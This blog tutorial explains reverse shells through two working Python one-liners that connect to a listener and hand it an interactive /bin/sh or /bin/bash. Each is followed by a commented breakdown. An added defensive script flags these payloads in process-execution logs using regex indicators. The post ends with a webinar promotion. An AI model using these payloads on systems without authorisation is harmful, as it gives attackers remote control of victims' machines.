[Tut] Python One Line Reverse Shell

Python One Line Reverse Shell

<div><p>This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:</p>
<h2>What is a Reverse Shell?</h2>
<p>Here’s the definition of a Reverse Shell:</p>
<p class="has-pale-cyan-blue-background-color has-background">A <strong>reverse shell</strong> is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.</p>
<p>You can read more <a href="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref" target="_blank" rel="noreferrer noopener" title="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref">here</a>. In this tutorial, you’ll learn how to create a reverse shell in one line of Python.</p>
<h2>Method 1</h2>
<p>I found this code in a <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" target="_blank" rel="noreferrer noopener" title="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">blog</a> thread. You can run it from any computer that has Python installed and can reach the listening machine over the network:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</pre>
<p>But you should never execute code that’s copy-pasted from an Internet source. What if the code removes all files from your computer?</p>
<p>Let’s have a look at what this code looks like as a Python multi-liner so that you can understand it better:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  # TCP socket
s.connect(("10.0.0.1",1234))                           # connect out to the listener
os.dup2(s.fileno(),0)                                  # stdin  -> socket
os.dup2(s.fileno(),1)                                  # stdout -> socket
os.dup2(s.fileno(),2)                                  # stderr -> socket
p=subprocess.call(["/bin/sh","-i"])                    # interactive shell on those descriptors
</pre>
<p>As you see, the code opens a socket (which is an entry point for a connection), <a href="https://www.tutorialspoint.com/python/os_dup2.htm" target="_blank" rel="noreferrer noopener" title="https://www.tutorialspoint.com/python/os_dup2.htm">duplicates the socket’s file descriptor</a> onto descriptors 0, 1 and 2 (stdin, stdout and stderr), and then calls a <a href="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/" target="_blank" rel="noreferrer noopener" title="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/">Linux shell</a>, whose input and output therefore travel over the socket. Thus, it will only run on Linux-based systems.</p>
<h2>Method 2</h2>
<p>In <a href="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7" target="_blank" rel="noreferrer noopener" title="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7">this</a> GitHub gist, I found another one-liner that opens a reverse shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'</pre>
<p>When writing the equivalent multi-liner, the code looks more understandable:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import pty
import socket,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  # TCP socket
s.connect(("Kali-IP",443))                          # connect out to the listener
os.dup2(s.fileno(),0)                               # stdin  -> socket
os.dup2(s.fileno(),1)                               # stdout -> socket
os.dup2(s.fileno(),2)                               # stderr -> socket
pty.spawn("/bin/bash")                              # bash attached to a pseudo-terminal
</pre>
<p>It’s very similar to the above code but uses the <code>pty</code> library to create the shell: <code>pty.spawn</code> runs bash attached to a pseudo-terminal instead of plain pipes, so the shell behaves like a normal interactive terminal session.</p>
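<p>Seen from the defender’s side, both one-liners share the same three-step fingerprint: an outbound <code>connect()</code>, <code>os.dup2</code> of the socket onto descriptors 0, 1 and 2, and a shell started with <code>subprocess.call</code> or <code>pty.spawn</code>. The script below is an added example (not part of the original post or of the sources it cites) that runs that detection over process-execution records. It assumes a hypothetical JSON-lines audit feed with <code>host</code>, <code>pid</code>, <code>user</code> and <code>cmdline</code> fields; the sample records, the indicator names and the verdict labels are all constructed for the example.</p>

```python
"""Flag process-execution records that match the reverse-shell pattern in the post."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Constructed audit records (hypothetical feed format): one JSON object per line with
# the executed command line, as an EDR or auditd forwarder might emit. The first two
# are the post's one-liners (listener address replaced with a documentation IP); the
# last two are ordinary Python invocations that must not fire.
SAMPLE_LOG = "\n".join(json.dumps(ev) for ev in [
    {"host": "web01", "pid": 4242, "user": "www-data",
     "cmdline": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                "s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); "
                "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"},
    {"host": "web01", "pid": 4243, "user": "www-data",
     "cmdline": "python3 -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                "s.connect((\"198.51.100.7\",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
                "os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'"},
    {"host": "build02", "pid": 777, "user": "ci",
     "cmdline": "python3 -c 'import socket;s=socket.socket();s.connect((\"db.internal\",5432));print(s.getpeername())'"},
    {"host": "build02", "pid": 778, "user": "ci", "cmdline": "python3 manage.py migrate"},
])

# One indicator per step of the one-liners. tcp_connect also captures the peer so a
# responder knows which outbound flow to look for in network telemetry.
INDICATORS = {
    "tcp_connect": re.compile(r"\.connect\(\s*\(\s*[\"']([^\"']+)[\"']\s*,\s*(\d+)\s*\)"),
    "stdio_redirect": re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*[012]\s*\)"),
    "shell_spawn": re.compile(r"(?:subprocess\.call\(\s*\[\s*|pty\.spawn\(\s*)[\"']/bin/(?:ba)?sh[\"']"),
}


@dataclass
class Finding:
    host: str
    pid: int
    user: str
    matched: tuple[str, ...]   # indicator names that hit, in INDICATORS order
    destination: str | None    # "host:port" parsed from connect(), if any
    verdict: str               # "reverse_shell", "suspicious" or "benign"


def classify(cmdline: str) -> tuple[tuple[str, ...], str | None]:
    """Return the indicators present in a command line and the parsed connect() peer."""
    matched = tuple(name for name, rx in INDICATORS.items() if rx.search(cmdline))
    m = INDICATORS["tcp_connect"].search(cmdline)
    dest = f"{m.group(1)}:{m.group(2)}" if m else None
    return matched, dest


def verdict_for(matched: tuple[str, ...]) -> str:
    """Socket-backed stdio plus a shell is the core of the technique; a lone connect()
    is ordinary client code, so it stays benign."""
    hits = set(matched)
    if {"stdio_redirect", "shell_spawn"} <= hits:
        # With an outbound connect it is a reverse shell; without one the socket could
        # have come from accept() (bind shell), which still deserves a look.
        return "reverse_shell" if "tcp_connect" in hits else "suspicious"
    if len(hits) == 2:
        return "suspicious"
    return "benign"


def scan_log(text: str) -> list[Finding]:
    """Parse JSON-lines audit records and classify each command line."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        matched, dest = classify(ev["cmdline"])
        findings.append(Finding(ev["host"], ev["pid"], ev["user"], matched, dest, verdict_for(matched)))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        if f.verdict != "benign":
            print(f"{f.verdict:13} host={f.host} pid={f.pid} user={f.user} "
                  f"dest={f.destination} indicators={','.join(f.matched)}")
```

<p>The regexes key on the exact calls shown in this post, so treat a hit as one strong signal rather than complete coverage; in practice you would pair it with network telemetry (an interpreter process making an unexpected outbound connection) and with the process tree (a shell whose parent is a web server or interpreter) rather than rely on command-line matching alone.</p>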
<h2>Where to Go From Here?</h2>
<p>Enough theory, let’s get some practice!</p>
<p>To become successful in coding, you need to get out there and solve real problems for real people. That’s how you can become a six-figure earner easily. And that’s how you polish the skills you really need in practice. After all, what’s the use of learning theory that nobody ever needs?</p>
<p><strong>Practice projects are how you sharpen your saw in coding!</strong></p>
<p>Do you want to become a code master by focusing on practical code projects that actually earn you money and solve problems for people?</p>
<p>Then become a Python freelance developer! It’s the best way of approaching the task of improving your Python skills—even if you are a complete beginner.</p>
<p>Join my free webinar <a rel="noreferrer noopener" href="https://blog.finxter.com/webinar-freelancer/" target="_blank">“How to Build Your High-Income Skill Python”</a> and watch how I grew my coding business online and how you can, too—from the comfort of your own home.</p>
<p><a href="https://blog.finxter.com/webinar-freelancer/" target="_blank" rel="noreferrer noopener">Join the free webinar now!</a></p>
</div>


https://www.sickgaming.net/blog/2020/07/...rse-shell/


